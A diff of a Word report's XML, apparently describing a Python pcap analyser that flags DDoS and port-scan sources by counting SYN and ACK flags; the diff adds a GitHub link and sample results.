                           </w:r>
                         </w:p>
                         <w:p/>
@@ -877,6 +877,36 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
         <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Git Link: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId8" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:sz w:val="28"/>
+          </w:rPr>
+          <w:t>https://github.com/DarkFate13/TitaniumOrca</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="28"/>
         </w:rPr>
@@ -900,6 +930,7 @@
         <w:autoSpaceDN w:val="0"/>
         <w:adjustRightInd w:val="0"/>
         <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="24"/>
         </w:rPr>
@@ -968,11 +999,6 @@
         </w:rPr>
         <w:t>Our goal is to do the following:</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:contextualSpacing/>
-      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1212,21 +1238,7 @@
         <w:rPr>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">The Python script is designed to read in </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>pcap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> files and analyze for </w:t>
+        <w:t xml:space="preserve">The Python script is designed to read in pcap files and analyze for </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1335,49 +1347,8 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">$ python3 analyser.py </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>pcap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>namp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>nmap_standard_scan</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>$ python3 analyser.py pcap/namp/nmap_standard_scan</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1420,19 +1391,11 @@
         </w:rPr>
         <w:t xml:space="preserve">The script aims at parsing </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>pcap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> files and check for TCP packets. Then proceeds to check if it is a SYN packet.</w:t>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>pcap files and check for TCP packets. Then proceeds to check if it is a SYN packet.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1446,69 +1409,12 @@
           <w:sz w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t>syn_flag</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">( </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>.flags</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> &amp; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>dpkt.tcp.TH_SYN</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ) != 0</w:t>
+        <w:t>syn_flag = ( tcp.flags &amp; dpkt.tcp.TH_SYN ) != 0</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1522,69 +1428,12 @@
           <w:sz w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t>ack_flag</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">( </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>.flags</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> &amp; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>dpkt.tcp.TH_ACK</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ) != 0</w:t>
+        <w:t>ack_flag = ( tcp.flags &amp; dpkt.tcp.TH_ACK ) != 0</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1634,7 +1483,6 @@
         <w:rPr>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">We later check if it is a: </w:t>
       </w:r>
     </w:p>
@@ -1650,19 +1498,11 @@
           <w:sz w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>DDos</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Attack by:</w:t>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>DDos Attack by:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1681,48 +1521,7 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">for </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, count in </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>self.malicious</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>_ip.items</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>():</w:t>
+        <w:t>for ip, count in self.malicious_ip.items():</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1741,23 +1540,7 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t>if(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>count[</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>0] &gt; 3 * count[1]):</w:t>
+        <w:t>if(count[0] &gt; 3 * count[1]):</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1836,55 +1619,7 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">for </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> in </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>s.get_port_lists</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>).keys</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>():</w:t>
+        <w:t>for ip in s.get_port_lists().keys():</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1904,48 +1639,7 @@
           <w:sz w:val="24"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">ports = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>self.port</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>_list</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>[</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>]</w:t>
+        <w:t>ports = self.port_list[ip]</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1971,23 +1665,14 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">return </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve">return len(ports) &gt; </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t>len</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>(ports) &gt; 1000</w:t>
+        <w:t>25</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2001,6 +1686,1708 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>Results:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>pcap/portscan</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> [CHECK REPO FOR FILE]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Parsing.... Malicious IP Addresses with their SYN Packet Counts: </w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="GridTable4-Accent5"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="1396"/>
+        <w:gridCol w:w="755"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">IP Adress </w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:jc w:val="right"/>
+              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t>Count</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>10.100.25.14</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:jc w:val="right"/>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>29</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Do you wish to see the ports attacked/scanned? (y/n) : </w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="GridTable4-Accent5"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="1396"/>
+        <w:gridCol w:w="774"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">IP Adress </w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:jc w:val="right"/>
+              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t>Port</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>10.100.25.14</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:jc w:val="right"/>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>139</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
